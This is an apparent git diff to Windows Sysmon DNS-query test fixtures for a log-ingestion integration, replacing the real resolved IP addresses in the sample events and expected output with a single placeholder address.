@@ -7859,7 +7859,7 @@
 "ProcessId": "2736",
 "QueryName": "syndication.twitter.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;"
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;"
 }
 },
 "log": {
@@ -7880,7 +7880,7 @@
 "ProcessId": "2736",
 "QueryName": "ade.googlesyndication.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;",
+ "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:19.578"
 },
@@ -7899,7 +7899,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7912,7 +7912,7 @@ "@timestamp": "2021-05-05T15:30:51.712Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -7934,7 +7934,7 @@ "ProcessId": "356", "QueryName": "iecvlist.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;", + "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", 
@@ -7962,7 +7962,7 @@
 "ProcessId": "844",
 "QueryName": "tsfe.trafficshaping.dsp.mp.microsoft.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;",
+ "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;",
 "Image": "C:\\Windows\\System32\\svchost.exe"
 },
 "process": {
@@ -7986,7 +7986,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8121,7 +8121,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8149,7 +8149,7 @@
 "ProcessId": "1788",
 "QueryName": "v10.vortex-win.data.microsoft.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;",
+ "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;",
 "Image": "C:\\Windows\\System32\\svchost.exe"
 },
 "channel": "Microsoft-Windows-Sysmon/Operational",
@@ -8174,7 +8174,7 @@
 "provider_name": "Microsoft-Windows-Sysmon",
 "opcode": "Info",
 "event_data": {
- "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;",
+ "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;",
 "Image": "C:\\Windows\\System32\\svchost.exe",
 "UtcTime": "2019-07-18 03:43:04.400",
 "ProcessGuid": "{fa4a0de6-b1a3-5d2f-0000-00102f440100}",
@@ -8193,7 +8193,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -8533,7 +8533,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -8550,7 +8550,7 @@
 "ProcessId": "356",
 "QueryName": "c.urs.microsoft.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;"
+ "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;"
 },
 "channel": "Microsoft-Windows-Sysmon/Operational",
 "event_id": "22",
diff --git a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json
index c8d43a2cb5d..3ce2456a113 100644
--- a/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json
+++ b/packages/windows/data_stream/sysmon_operational/_dev/test/pipeline/test-events.json-expected.json
@@ -51,12 +51,12 @@
 "type": "CNAME"
 },
 {
- "data": "23.223.14.67",
+ "data": "89.160.20.156",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "23.223.14.67"
+ "89.160.20.156"
 ]
 },
 "network": {
@@ -73,13 +73,13 @@
 "go.microsoft.com"
 ],
 "ip": [
- "23.223.14.67"
+ "89.160.20.156"
 ]
 },
 "event": {
- "ingested": "2021-06-14T13:23:14.740999700Z",
+ "ingested": "2021-12-09T13:50:23.456572100Z",
 "code": "22",
- "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e",
+ "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
